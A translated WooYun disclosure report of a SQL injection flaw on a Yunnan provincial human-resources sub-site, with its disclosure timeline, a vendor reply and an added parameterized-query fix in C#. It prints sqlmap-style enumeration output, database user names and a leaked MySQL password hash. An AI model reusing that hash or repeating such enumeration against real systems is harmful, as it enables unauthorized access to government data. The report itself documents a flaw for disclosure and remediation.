Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0143822

Title: SQL injection vulnerability in a provincial military-transfer resettlement website

Vendor: Yunnan Provincial Department of Human Resources and Social Security

Author: 路人甲

Submitted: 2015-10-06 22:35

Fixed: 2015-11-26 11:14

Published: 2015-11-26 11:14

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 10

Status: Handed over to a third-party partner (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]


Vulnerability details

Disclosure status:

2015-10-06: Details sent to the vendor, awaiting vendor handling
2015-10-12: Vendor confirmed; details visible to the vendor only
2015-10-22: Details disclosed to core white hats and domain experts
2015-11-01: Details disclosed to regular white hats
2015-11-11: Details disclosed to intern white hats
2015-11-26: Details disclosed to the public

Brief description:

A sub-site of the Province X Human Resources and Social Security website has a SQL injection vulnerability; multiple databases are exposed, including the main site's database.

Detailed description:

A second-level sub-site of the Yunnan Provincial Human Resources and Social Security website is vulnerable to SQL injection; multiple databases are exposed and sensitive data leaks. Tool output:
back-end DBMS: MySQL 5.0
Database: sakila
[23 tables]
+----------------------------------------------------+
| language |
| actor |
| actor_info |
| address |
| category |
| city |
| country |
| customer |
| customer_list |
| film |
| film_actor |
| film_category |
| film_list |
| film_text |
| inventory |
| nicer_but_slower_film_list |
| payment |
| rental |
| sales_by_film_category |
| sales_by_store |
| staff |
| staff_list |
| store |
+----------------------------------------------------+
Database: performance_schema
[52 tables]
+----------------------------------------------------+
| accounts |
| cond_instances |
| events_stages_current |
| events_stages_history |
| events_stages_history_long |
| events_stages_summary_by_account_by_event_name |
| events_stages_summary_by_host_by_event_name |
| events_stages_summary_by_thread_by_event_name |
| events_stages_summary_by_user_by_event_name |
| events_stages_summary_global_by_event_name |
| events_statements_current |
| events_statements_history |
| events_statements_history_long |
| events_statements_summary_by_account_by_event_name |
| events_statements_summary_by_digest |
| events_statements_summary_by_host_by_event_name |
| events_statements_summary_by_thread_by_event_name |
| events_statements_summary_by_user_by_event_name |
| events_statements_summary_global_by_event_name |
| events_waits_current |
| events_waits_history |
| events_waits_history_long |
| events_waits_summary_by_account_by_event_name |
| events_waits_summary_by_host_by_event_name |
| events_waits_summary_by_instance |
| events_waits_summary_by_thread_by_event_name |
| events_waits_summary_by_user_by_event_name |
| events_waits_summary_global_by_event_name |
| file_instances |
| file_summary_by_event_name |
| file_summary_by_instance |
| host_cache |
| hosts |
| mutex_instances |
| objects_summary_global_by_type |
| performance_timers |
| rwlock_instances |
| session_account_connect_attrs |
| session_connect_attrs |
| setup_actors |
| setup_consumers |
| setup_instruments |
| setup_objects |
| setup_timers |
| socket_instances |
| socket_summary_by_event_name |
| socket_summary_by_instance |
| table_io_waits_summary_by_index_usage |
| table_io_waits_summary_by_table |
| table_lock_waits_summary_by_table |
| threads |
| users |
+----------------------------------------------------+
Database: mysql
[28 tables]
+----------------------------------------------------+
| user |
| columns_priv |
| db |
| event |
| func |
| general_log |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| innodb_index_stats |
| innodb_table_stats |
| ndb_binlog_index |
| plugin |
| proc |
| procs_priv |
| proxies_priv |
| servers |
| slave_master_info |
| slave_relay_log_info |
| slave_worker_info |
| slow_log |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
+----------------------------------------------------+
Database: world
[3 tables]
+----------------------------------------------------+
| city |
| country |
| countrylanguage |
+----------------------------------------------------+
Database: db_ynhrss
[41 tables]
+----------------------------------------------------+
| ccphl_appinfo |
| ccphl_indexplace |
| ccphl_leave_msg |
| ccphl_link |
| ccphl_news |
| ccphl_news_attach |
| ccphl_news_deputy |
| ccphl_news_image |
| ccphl_newsclass |
| ccphl_newsclasspermit |
| ccphl_newsidentitypermit |
| ccphl_newspost |
| ccphl_system_class_function |
| ccphl_system_function |
| ccphl_system_module_function |
| ccphl_system_role_class_button |
| ccphl_system_role_class_function |
| ccphl_system_role_module_button |
| ccphl_system_role_module_function |
| ccphl_system_role_user |
| ccphl_system_user_class_button |
| ccphl_system_user_class_function |
| ccphl_system_user_module_button |
| ccphl_system_user_module_function |
| ccphl_systemadclass |
| ccphl_systemadvertise |
| ccphl_systemdictionary |
| ccphl_systemlog |
| ccphl_systemmodule |
| ccphl_systemrole |
| ccphl_systemrolemodule_test |
| ccphl_systemsite |
| ccphl_systemuser |
| ccphl_template |
| ccphl_template_block_content |
| ccphl_template_siteused |
| ccphl_workloadstatistic |
| hz_infolib |
| hz_rules |
| hzinfocategory |
| testup |
+----------------------------------------------------+
Database: information_schema
[59 tables]
+----------------------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| INNODB_BUFFER_PAGE |
| INNODB_BUFFER_PAGE_LRU |
| INNODB_BUFFER_POOL_STATS |
| INNODB_CMP |
| INNODB_CMPMEM |
| INNODB_CMPMEM_RESET |
| INNODB_CMP_PER_INDEX |
| INNODB_CMP_PER_INDEX_RESET |
| INNODB_CMP_RESET |
| INNODB_FT_BEING_DELETED |
| INNODB_FT_CONFIG |
| INNODB_FT_DEFAULT_STOPWORD |
| INNODB_FT_DELETED |
| INNODB_FT_INDEX_CACHE |
| INNODB_FT_INDEX_TABLE |
| INNODB_LOCKS |
| INNODB_LOCK_WAITS |
| INNODB_METRICS |
| INNODB_SYS_COLUMNS |
| INNODB_SYS_DATAFILES |
| INNODB_SYS_FIELDS |
| INNODB_SYS_FOREIGN |
| INNODB_SYS_FOREIGN_COLS |
| INNODB_SYS_INDEXES |
| INNODB_SYS_TABLES |
| INNODB_SYS_TABLESPACES |
| INNODB_SYS_TABLESTATS |
| INNODB_TRX |
| KEY_COLUMN_USAGE |
| OPTIMIZER_TRACE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+----------------------------------------------------+

Proof of vulnerability:

http://**.**.**.**/index.html
http://**.**.**.**/lmsg.aspx?classId=655
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.0
back-end DBMS: MySQL 5.0
current user is DBA: False
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.0
back-end DBMS: MySQL 5.0
database management system users [7]:
[*] 'root'@'%'
[*] 'root'@'**.**.**.**'
[*] 'root'@'::1'
[*] 'root'@'localhost'
[*] 'ynhrss_km_cms'@'**.**.**.**'
[*] 'ynhrss_km_cms'@'**.**.**.**'
[*] 'ynhrss_km_cms'@'localhost'
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.0
back-end DBMS: MySQL 5.0
database management system users password hashes:
[*] ynhrss_km_cms [1]:
password hash: *F694A062B2B0E8BB360D5A89C779DF0B80D484E3

Remediation:

You know what to do!
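The remediation section leaves the fix unstated. As an added example (not code from the report or from the affected site), the following ASP.NET page handles the `classId` parameter of `lmsg.aspx` with type validation and a parameterized MySQL query, and reads through a connection string for a least-privileged account so that a future injection could not enumerate `mysql.user` or unrelated schemas the way the report shows. The column names, the `lmsg_app` connection string and account, and the `MessageList` control are assumptions; the report only names the table `db_ynhrss.ccphl_leave_msg`.

```csharp
// Added example, not the site's code: hardened data access for lmsg.aspx?classId=N
// against a MySQL back end via the MySql.Data client. Assumed names are marked.
using System;
using System.Collections.Generic;
using System.Configuration;
using System.Web.UI;
using MySql.Data.MySqlClient;

public partial class Lmsg : Page
{
    protected void Page_Load(object sender, EventArgs e)
    {
        // Reject anything that is not a non-negative integer before it reaches SQL.
        int classId;
        if (!int.TryParse(Request.QueryString["classId"], out classId) || classId < 0)
        {
            Response.StatusCode = 400;
            return;
        }
        foreach (string title in LeaveMessageRepository.TitlesByClass(classId))
            MessageList.Items.Add(title);   // MessageList: assumed ListBox control on the page
    }
}

public static class LeaveMessageRepository
{
    // Column names (class_id, title) are assumptions; the report only names the table.
    const string Sql = "SELECT title FROM ccphl_leave_msg WHERE class_id = @classId";

    public static List<string> TitlesByClass(int classId)
    {
        var titles = new List<string>();
        // "lmsg_app" is an assumed connection string for an account created with only
        //   GRANT SELECT, INSERT ON db_ynhrss.* TO 'lmsg_app'@'localhost';
        // so the application cannot read mysql.user or other schemas even if a query
        // is ever injected again.
        string cs = ConfigurationManager.ConnectionStrings["lmsg_app"].ConnectionString;
        using (var conn = new MySqlConnection(cs))
        using (var cmd = new MySqlCommand(Sql, conn))
        {
            // Bound as a typed parameter: the value is never spliced into the query text.
            cmd.Parameters.Add("@classId", MySqlDbType.Int32).Value = classId;
            conn.Open();
            using (var rdr = cmd.ExecuteReader())
                while (rdr.Read()) titles.Add(rdr.GetString(0));
        }
        return titles;
    }
}
```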

Copyright notice: when reposting, please credit the source 路人甲@乌云


Responses

Vendor response:

Severity: Medium

Vulnerability Rank: 8

Confirmed: 2015-10-12 11:13

Vendor reply:

CNVD has confirmed the described situation; it has been passed to CNCERT and dispatched to the Yunnan branch center, which will coordinate handling with the website's administering unit.

Latest status:

None yet